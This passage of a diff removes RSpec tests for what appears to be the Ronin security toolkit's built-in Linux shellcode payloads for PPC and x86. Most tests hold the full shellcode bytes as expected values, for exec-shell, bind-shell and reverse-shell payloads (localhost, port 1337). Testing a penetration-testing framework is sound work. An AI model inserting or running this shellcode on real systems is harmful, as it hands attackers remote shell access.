28
- it "must equal :linux" do
29
- expect(subject.os).to be(:linux)
30
- end
31
- end
32
-
33
- describe "#build" do
34
- before { subject.build }
35
-
36
- it "must set #payload" do
37
- expect(subject.payload).to eq(
38
- "\x7c\x3f\x0b\x78\x7c\xa5\x2a\x79\x42\x40\xff\xf9\x7f\x08\x02\xa6\x3b\x18\x01\x34\x98\xb8\xfe\xfb\x38\x78\xfe\xf4\x90\x61\xff\xf8\x38\x81\xff\xf8\x90\xa1\xff\xfc\x3b\xc0\x01\x60\x7f\xc0\x2e\x70\x44\xde\xad\xf2/bin/shZ".b
39
- )
40
- end
41
-
42
- it "must ensure #payload is an ASCII 8bit string" do
43
- expect(subject.payload.encoding).to eq(Encoding::ASCII_8BIT)
44
- end
45
- end
46
- end
@@ -1,87 +0,0 @@
1
- require 'spec_helper'
2
- require 'ronin/payloads/builtin/shellcode/linux/ppc/reverse_shell'
3
-
4
- describe Ronin::Payloads::Shellcode::Linux::PPC::ReverseShell do
5
- it "must inherit from Ronin::Payloads::Shellcode::ReverseShellPayload" do
6
- expect(described_class).to be < Ronin::Payloads::Shellcode::ReverseShellPayload
7
- end
8
-
9
- describe ".id" do
10
- subject { described_class }
11
-
12
- it "must equal 'shellcode/linux/ppc/reverse_shell'" do
13
- expect(subject.id).to eq('shellcode/linux/ppc/reverse_shell')
14
- end
15
- end
16
-
17
- describe ".arch" do
18
- subject { described_class }
19
-
20
- it "must equal :ppc" do
21
- expect(subject.arch).to be(:ppc)
22
- end
23
- end
24
-
25
- describe ".os" do
26
- subject { described_class }
27
-
28
- it "must equal :linux" do
29
- expect(subject.os).to be(:linux)
30
- end
31
- end
32
-
33
- describe "params" do
34
- subject { described_class }
35
-
36
- it "must define a with_stderr param that defualts to true" do
37
- expect(subject.params[:with_stderr]).to_not be(nil)
38
- expect(subject.params[:with_stderr].type).to be_kind_of(Ronin::Core::Params::Types::Boolean)
39
- expect(subject.params[:with_stderr].desc).to eq('Enables/disables stderr')
40
- expect(subject.params[:with_stderr].default).to be(true)
41
- end
42
- end
43
-
44
- let(:host) { '127.0.0.1' }
45
- let(:port) { 1337 }
46
-
47
- subject do
48
- described_class.new(
49
- params: {
50
- host: host,
51
- port: port
52
- }
53
- )
54
- end
55
-
56
- describe "#build" do
57
- before { subject.build }
58
-
59
- it "must set #payload" do
60
- expect(subject.payload).to eq(
61
- "\x7c\x3f\x0b\x78\x3b\x40\x01\x0e\x3b\x5a\xfe\xf4\x7f\x43\xd3\x78\x3b\x60\x01\x0d\x3b\x7b\xfe\xf4\x7f\x64\xdb\x78\x7c\xa5\x2a\x78\x7c\x3c\x0b\x78\x3b\x9c\x01\x0c\x90\x7c\xff\x08\x90\x9c\xff\x0c\x90\xbc\xff\x10\x7f\x63\xdb\x78\x3b\xdf\x01\x0c\x38\x9e\xff\x08\x3b\x20\x01\x98\x7f\x20\x16\x70\x44\xde\xad\xf2\x7c\x78\x1b\x78\xb3\x5e\xff\x16\x7f\xbd\xea\x78\x63\xbd\x05\x39\xb3\xbe\xff\x18\x3f\xa0\x7f\x00\x63\xbd\x00\x01\x93\xbe\xff\x1a\x93\x1c\xff\x08\x3a\xde\xff\x16\x92\xdc\xff\x0c\x3b\xa0\x01\x1c\x38\xbd\xfe\xf4\x90\xbc\xff\x10\x7f\x20\x16\x70\x7c\x7a\xda\x14\x38\x9c\xff\x08\x44\xde\xad\xf2\x7f\x03\xc3\x78\x7c\x84\x22\x78\x3a\xe0\x01\xf8\x7e\xe0\x1e\x70\x44\xde\xad\xf2\x7f\x03\xc3\x78\x7f\x64\xdb\x78\x7e\xe0\x1e\x70\x44\xde\xad\xf2\x7f\x03\xc3\x78\x7f\x44\xd3\x78\x7e\xe0\x1e\x70\x44\xde\xad\xf2\x7c\xa5\x2a\x79\x42\x40\xff\x35\x7f\x08\x02\xa6\x3b\x18\x01\x34\x98\xb8\xfe\xfb\x38\x78\xfe\xf4\x90\x61\xff\xf8\x38\x81\xff\xf8\x90\xa1\xff\xfc\x3b\xc0\x01\x60\x7f\xc0\x2e\x70\x44\xde\xad\xf2/bin/shZ".b
62
- )
63
- end
64
-
65
- it "must ensure #payload is an ASCII 8bit string" do
66
- expect(subject.payload.encoding).to eq(Encoding::ASCII_8BIT)
67
- end
68
-
69
- context "when the with_stderr param is set to false" do
70
- subject do
71
- described_class.new(
72
- params: {
73
- host: host,
74
- port: port,
75
- with_stderr: false
76
- }
77
- )
78
- end
79
-
80
- it "must omit the four instructions which enable piping stderr" do
81
- expect(subject.payload).to eq(
82
- "\x7c\x3f\x0b\x78\x3b\x40\x01\x0e\x3b\x5a\xfe\xf4\x7f\x43\xd3\x78\x3b\x60\x01\x0d\x3b\x7b\xfe\xf4\x7f\x64\xdb\x78\x7c\xa5\x2a\x78\x7c\x3c\x0b\x78\x3b\x9c\x01\x0c\x90\x7c\xff\x08\x90\x9c\xff\x0c\x90\xbc\xff\x10\x7f\x63\xdb\x78\x3b\xdf\x01\x0c\x38\x9e\xff\x08\x3b\x20\x01\x98\x7f\x20\x16\x70\x44\xde\xad\xf2\x7c\x78\x1b\x78\xb3\x5e\xff\x16\x7f\xbd\xea\x78\x63\xbd\x05\x39\xb3\xbe\xff\x18\x3f\xa0\x7f\x00\x63\xbd\x00\x01\x93\xbe\xff\x1a\x93\x1c\xff\x08\x3a\xde\xff\x16\x92\xdc\xff\x0c\x3b\xa0\x01\x1c\x38\xbd\xfe\xf4\x90\xbc\xff\x10\x7f\x20\x16\x70\x7c\x7a\xda\x14\x38\x9c\xff\x08\x44\xde\xad\xf2\x7f\x03\xc3\x78\x7c\x84\x22\x78\x3a\xe0\x01\xf8\x7e\xe0\x1e\x70\x44\xde\xad\xf2\x7f\x03\xc3\x78\x7f\x64\xdb\x78\x7e\xe0\x1e\x70\x44\xde\xad\xf2\x7c\xa5\x2a\x79\x42\x40\xff\x35\x7f\x08\x02\xa6\x3b\x18\x01\x34\x98\xb8\xfe\xfb\x38\x78\xfe\xf4\x90\x61\xff\xf8\x38\x81\xff\xf8\x90\xa1\xff\xfc\x3b\xc0\x01\x60\x7f\xc0\x2e\x70\x44\xde\xad\xf2/bin/shZ".b
83
- )
84
- end
85
- end
86
- end
87
- end
@@ -1,60 +0,0 @@
1
- require 'spec_helper'
2
- require 'ronin/payloads/builtin/shellcode/linux/x86/bind_shell'
3
-
4
- describe Ronin::Payloads::Shellcode::Linux::X86::BindShell do
5
- it "must inherit from Ronin::Payloads::Shellcode::BindShellPayload" do
6
- expect(described_class).to be < Ronin::Payloads::Shellcode::BindShellPayload
7
- end
8
-
9
- describe ".id" do
10
- subject { described_class }
11
-
12
- it "must equal 'shellcode/linux/x86/bind_shell'" do
13
- expect(subject.id).to eq('shellcode/linux/x86/bind_shell')
14
- end
15
- end
16
-
17
- describe ".arch" do
18
- subject { described_class }
19
-
20
- it "must equal :x86" do
21
- expect(subject.arch).to be(:x86)
22
- end
23
- end
24
-
25
- describe ".os" do
26
- subject { described_class }
27
-
28
- it "must equal :linux" do
29
- expect(subject.os).to be(:linux)
30
- end
31
- end
32
-
33
- let(:host) { 'example.com' }
34
- let(:port) { 1337 }
35
-
36
- subject do
37
- described_class.new(
38
- params: {
39
- host: host,
40
- port: port
41
- }
42
- )
43
- end
44
-
45
- describe "#build" do
46
- before { subject.build }
47
-
48
- let(:packed_port) { "\x05\x39".b }
49
-
50
- it "must set #payload" do
51
- expect(subject.payload).to eq(
52
- "\x6a\x66\x58\x31\xdb\x53\x43\x53\x6a\x02\x89\xe1\xcd\x80\x31\xd2\x52\x68\xff\x02#{packed_port}\x89\xe1\x6a\x10\x51\x50\x89\xe1\x89\xc6\x43\xb0\x66\xcd\x80\xb0\x66\x43\x43\xcd\x80\x50\x56\x89\xe1\x43\xb0\x66\xcd\x80\x93\x6a\x03\x59\x49\x6a\x3f\x58\xcd\x80\x75\xf8\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80".b
53
- )
54
- end
55
-
56
- it "must ensure #payload is an ASCII 8bit string" do
57
- expect(subject.payload.encoding).to eq(Encoding::ASCII_8BIT)
58
- end
59
- end
60
- end
@@ -1,46 +0,0 @@
1
- require 'spec_helper'
2
- require 'ronin/payloads/builtin/shellcode/linux/x86/exec_shell'
3
-
4
- describe Ronin::Payloads::Shellcode::Linux::X86::ExecShell do
5
- it "must inherit from Ronin::Payloads::Shellcode::ExecShellPayload" do
6
- expect(described_class).to be < Ronin::Payloads::Shellcode::ExecShellPayload
7
- end
8
-
9
- describe ".id" do
10
- subject { described_class }
11
-
12
- it "must equal 'shellcode/linux/x86/exec_shell'" do
13
- expect(subject.id).to eq('shellcode/linux/x86/exec_shell')
14
- end
15
- end
16
-
17
- describe ".arch" do
18
- subject { described_class }
19
-
20
- it "must equal :x86" do
21
- expect(subject.arch).to be(:x86)
22
- end
23
- end
24
-
25
- describe ".os" do
26
- subject { described_class }
27
-
28
- it "must equal :linux" do
29
- expect(subject.os).to be(:linux)
30
- end
31
- end
32
-
33
- describe "#build" do
34
- before { subject.build }
35
-
36
- it "must set #payload" do
37
- expect(subject.payload).to eq(
38
- "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80".b
39
- )
40
- end
41
-
42
- it "must ensure #payload is an ASCII 8bit string" do
43
- expect(subject.payload.encoding).to eq(Encoding::ASCII_8BIT)
44
- end
45
- end
46
- end
@@ -1,58 +0,0 @@
1
- require 'spec_helper'
2
- require 'ronin/payloads/builtin/shellcode/linux/x86/reverse_shell'
3
-
4
- describe Ronin::Payloads::Shellcode::Linux::X86::ReverseShell do
5
- it "must inherit from Ronin::Payloads::Shellcode::ReverseShellPayload" do
6
- expect(described_class).to be < Ronin::Payloads::Shellcode::ReverseShellPayload
7
- end
8
-
9
- describe ".id" do
10
- subject { described_class }
11
-
12
- it "must equal 'shellcode/linux/x86/reverse_shell'" do
13
- expect(subject.id).to eq('shellcode/linux/x86/reverse_shell')
14
- end
15
- end
16
-
17
- describe ".arch" do
18
- subject { described_class }
19
-
20
- it "must equal :x86" do
21
- expect(subject.arch).to be(:x86)
22
- end
23
- end
24
-
25
- describe ".os" do
26
- subject { described_class }
27
-
28
- it "must equal :linux" do
29
- expect(subject.os).to be(:linux)
30
- end
31
- end
32
-
33
- let(:host) { '127.0.0.1' }
34
- let(:port) { 1337 }
35
-
36
- subject do
37
- described_class.new(
38
- params: {
39
- host: host,
40
- port: port
41
- }
42
- )
43
- end
44
-
45
- describe "#build" do
46
- before { subject.build }
47
-
48
- it "must set #payload" do
49
- expect(subject.payload).to eq(
50
- "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x66\xb3\x01\x51\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\x31\xdb\xb3\x02\x68\x7f\x00\x00\x01\x66\x68\x05\x39\x66\x53\xfe\xc3\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x31\xc0\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80".b
51
- )
52
- end
53
-
54
- it "must ensure #payload is an ASCII 8bit string" do
55
- expect(subject.payload.encoding).to eq(Encoding::ASCII_8BIT)
56
- end
57
- end
58
- end